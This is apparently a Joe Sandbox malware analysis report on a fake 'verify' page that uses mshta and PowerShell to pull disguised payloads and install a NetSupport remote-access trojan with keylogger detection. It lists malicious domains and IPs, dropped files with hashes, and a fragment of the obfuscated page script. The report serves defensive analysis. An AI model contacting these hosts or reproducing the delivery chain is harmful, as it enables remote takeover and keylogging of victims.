https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | unknown
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              unknown
                                                                                                                              https://go.micropowershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://traversecityspringbreak.com/o/9.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                unknown
                                                                                                                                https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://inspyrehomedesign.com/Nmshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                  unknown
                                                                                                                                  http://traversecityspringbreak.com/o/8.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                    unknown
                                                                                                                                    http://traversecityspringbreak.com/o/10.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      unknown
                                                                                                                                      http://127.0.0.1client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                                                                                        unknown
                                                                                                                                        https://inspyrehomedesign.com/Ray-verify.html...Imshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          unknown
                                                                                                                                          https://inspyrehomedesign.com/Ray-verify.html...Pmshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                            unknown
                                                                                                                                            http://www.symauth.com/cps0(powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drtrue
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                              unknown
                                                                                                                                              http://www.protware.commshta.exe, 0000000B.00000003.1756113861.00000254956E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1757874634.0000025C98246000.00000004.00000020.00020000.00000000.sdmp, Ray-verify[1].htm.11.dr, chromecache_88.1.drtrue
                                                                                                                                                unknown
                                                                                                                                                http://geo.netsupportsoftware.com/location/loca.asphnclient32.exe, 00000015.00000003.2277891273.00000000013DB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  unknown
                                                                                                                                                  http://traversecityspringbreak.com/o/2.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                    unknown
                                                                                                                                                    http://www.symauth.com/rpa00powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drtrue
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://inspyrehomedesign.com/Ray-verify.htmldVmshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                      unknown
                                                                                                                                                      http://traversecityspringbreak.comppowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                        unknown
                                                                                                                                                        https://inspyrehomedesign.com/Ray-verify.html#?mshta.exe, 0000000B.00000002.1765266374.0000025495940000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1768096542.0000025C9C990000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                          unknown
                                                                                                                                                          https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://traversecityspringbreak.com/o/1.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                            unknown
                                                                                                                                                            http://traversecityspringbreak.com/o/12.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                              unknown
                                                                                                                                                              http://crl.vpowershell.exe, 0000000C.00000002.2018709421.000002F279A3A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
166.1.160.211 | traversecityspringbreak.com | United States | 11798 | ACEDATACENTERS-AS-1US | true
172.67.68.212 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
162.19.58.157 | i.ibb.co | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
92.255.85.135 | unknown | Russian Federation | 42097 | SOVTEL-ASRU | true
166.1.160.75 | inspyrehomedesign.com | United States | 11798 | ACEDATACENTERS-AS-1US | true
172.217.16.196 | www.google.com | United States | 15169 | GOOGLEUS | false
169.197.85.95 | unknown | United States | 26548 | PUREVOLTAGE-INCUS | false
                                                                                                                                                              IP
                                                                                                                                                              192.168.2.16
                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1544089
                                                                                                                                                              Start date and time:2024-10-28 19:44:45 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 6m 46s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                              Sample URL:https://inspyrehomedesign.com/Ray-verify.html
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:23
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.rans.phis.troj.evad.win@30/39@14/9
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 52%
                                                                                                                                                              • Number of executed functions: 127
                                                                                                                                                              • Number of non-executed functions: 249
                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.110, 74.125.133.84, 142.250.185.163, 34.104.35.123, 93.184.221.240, 172.67.142.245, 104.21.27.152, 142.250.186.99, 2.19.126.163, 216.58.206.46
                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 7848 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: https://inspyrehomedesign.com/Ray-verify.html
Time | Type | Description
14:46:11 | API Interceptor | 1x Sleep call for process: mshta.exe modified
14:46:14 | API Interceptor | 106x Sleep call for process: powershell.exe modified
14:47:05 | API Interceptor | 176x Sleep call for process: client32.exe modified
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):15
                                                                                                                                                              Entropy (8bit):2.7329145639793984
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QJgTG:QkG
                                                                                                                                                              MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                                                                              SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                                                                              SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                                                                              SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:32.7767,-96.797
                                                                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):10478
                                                                                                                                                              Entropy (8bit):6.1437966409549345
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:+YdzCOGbqUhwFRyC7lzBpi58Q0cW3O3AMw8+Ezgl02pmiV5ASidm4EcMvYf5:+YduOGPwFz7lzO58Q0m+0MnX4X
                                                                                                                                                              MD5:977BB6913B1F65A6472727EA4F362E97
                                                                                                                                                              SHA1:1D1247A8F9359576C913E9586D72F0D51773B22C
                                                                                                                                                              SHA-256:CACE794532FFC2A8275C86E4248CA38CF85DFB209D630E05E049D6FE2047EA2E
                                                                                                                                                              SHA-512:02E3D08AFED87051CD5D7DE046CFECE58731901EF985F8A76E4110130ED4A364ABAC06E77D124E185E146502BF4170AAF07E81272DB9C100FAFF878ACFE48EFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';ilY5HP79zs2='e6Fwtnl9Iy7X';</script><script>oS3zB7k=new Array();oS3zB7k[0]='\141\151\165%31%49%4A%31%33%48\121%32%38';wL6mXZ4=new Array();wL6mXZ4[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11608
                                                                                                                                                              Entropy (8bit):4.890472898059848
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):17640
                                                                                                                                                              Entropy (8bit):5.486548466185529
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:RBhjrVVMuHAx0B4cIpvIU6XNqa4vqzpfO48n5aiTkJRBOtqkovbhpFN8Zgn:trrMp0eaXNqa40Zqp6RKEbhpwZ6
                                                                                                                                                              MD5:AB56647317D7F17022D3617E27014E0A
                                                                                                                                                              SHA1:0B5D58A45391E492B4703A6D60440080C0A35C2B
                                                                                                                                                              SHA-256:26467D122190301517F995566D89BE5E82AD0D6987A20D3FE41ED592AC565BBE
                                                                                                                                                              SHA-512:B7262E9E765A8A2D8BD26DA6FE843BAD11D25B28F9E74C04E91C996D6FE78699AC70DBC20DD50B275906137409B31DA5AB7C69AB40E875EE52BEB84E46B0303B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2673
                                                                                                                                                              Entropy (8bit):3.9791573052758777
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8nKXdiTu6SAH+idAKZdA1FehwiZUklqehRy+3:8ndrSl+y
                                                                                                                                                              MD5:A7078C529B164AD11749239213F5300B
                                                                                                                                                              SHA1:7DB644D9642CF502BB62E864D05D1E53976BF442
                                                                                                                                                              SHA-256:7226CEAC76363B8644C247699E6F399BEEA0C43CBEC5FB48B203CBEF7C1584AA
                                                                                                                                                              SHA-512:07BEA185CA438A5331496EC7A7615F3D61194B88EF204F1E1C21E9AF90E6C80B39B0267220B5DD3D761609AB53B3A41FC18997DF0963711A73464944F47C77FF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2675
                                                                                                                                                              Entropy (8bit):3.995902864324656
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8HFXdiTu6SAH+idAKZdA1seh/iZUkAQkqehuy+2:8H+rS79Qzy
                                                                                                                                                              MD5:0D22629B6E8E308635DC3232AB865F2F
                                                                                                                                                              SHA1:418943C0635EBFF72D058F6EE7D53F069B38CAC6
                                                                                                                                                              SHA-256:60FB8C86CD3E936D4501DB100EB5D34080B54077F1D38E328C1EC0354D11398B
                                                                                                                                                              SHA-512:4219879BAE9FD68B70936970C75361B031BA99897EFC3CBA9402E90A00DC388434CC90340285C159829FAFCA8503CEA6C088A8FA507655A2F017F9245A624B1A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2689
                                                                                                                                                              Entropy (8bit):4.003723006029388
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:86XdiTu6AH+idAKZdA14meh7sFiZUkmgqeh7sYy+BX:8Nrvnqy
                                                                                                                                                              MD5:CABEE07B70231FA7507182A8497EBFDB
                                                                                                                                                              SHA1:6D64B4C5E024A4748CF2AF80B8F1A5623E6800FF
                                                                                                                                                              SHA-256:7E7126D0180DC4373996A27B00426B733656B2DEE8E5F65F704A17CDA66E9490
                                                                                                                                                              SHA-512:EA7612B5847345ACA2B8867F1CC425FFD7B4E035EA66F19A3BCD6BA97E6CABE10A6F99157E7254A1D0BC0A0723F70923CC776CA6F733869848325FBFB16F4FD0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2677
                                                                                                                                                              Entropy (8bit):3.992674802425967
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2677
                                                                                                                                                              Entropy (8bit):3.982302607280827
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2679
                                                                                                                                                              Entropy (8bit):3.991232123413837
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):328056
                                                                                                                                                              Entropy (8bit):6.754723001562745
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):257
                                                                                                                                                              Entropy (8bit):5.119720931145611
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:Generic INItialization configuration [Features]
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6458
                                                                                                                                                              Entropy (8bit):4.645519507940197
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18808
                                                                                                                                                              Entropy (8bit):6.22028391196942
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3735416
                                                                                                                                                              Entropy (8bit):6.525042992590476
                                                                                                                                                              Encrypted:false
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):396664
                                                                                                                                                              Entropy (8bit):6.809064783360712
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                                                                              MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                                                                              SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                                                                              SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                                                                              SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
